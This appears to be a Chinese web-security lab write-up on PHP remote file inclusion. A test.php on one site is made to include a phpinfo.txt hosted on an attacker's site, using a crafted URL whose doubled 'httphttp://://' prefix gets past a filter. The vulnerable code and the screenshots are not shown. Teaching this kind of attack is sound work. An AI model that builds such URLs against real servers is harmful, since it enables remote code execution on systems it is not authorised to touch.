文件包含漏洞实验

在本次实验前要先开启远程包含如下图所示:

文件包含漏洞实验_第1张图片

php程序员小白将下面的代码命名成test.php部署到网站http://websecurity.163.com/的根目录下


安全工程师小黑研究该网站后在自己网站http://hack.163.com/根目录下上传了phpinfo.txt代码如下:


请问小黑利用该phpinfo.txt应该如何构造URL才能在websecurity.163.com执行phpinfo函数?


我们可以很容易的知道url为:http://websecurity.163.com/demo1/test.php?file=httphttp://://hack.163.com/demo1/phpinfo.txt


我们用本机测试下:

http://websecurity.163.com/demo1/test.php?file=httphttp://://websecurity.163.com/demo1/phpinfo.txt

如下图:

文件包含漏洞实验_第2张图片



你可能感兴趣的:(WEB安全,Web相关技术)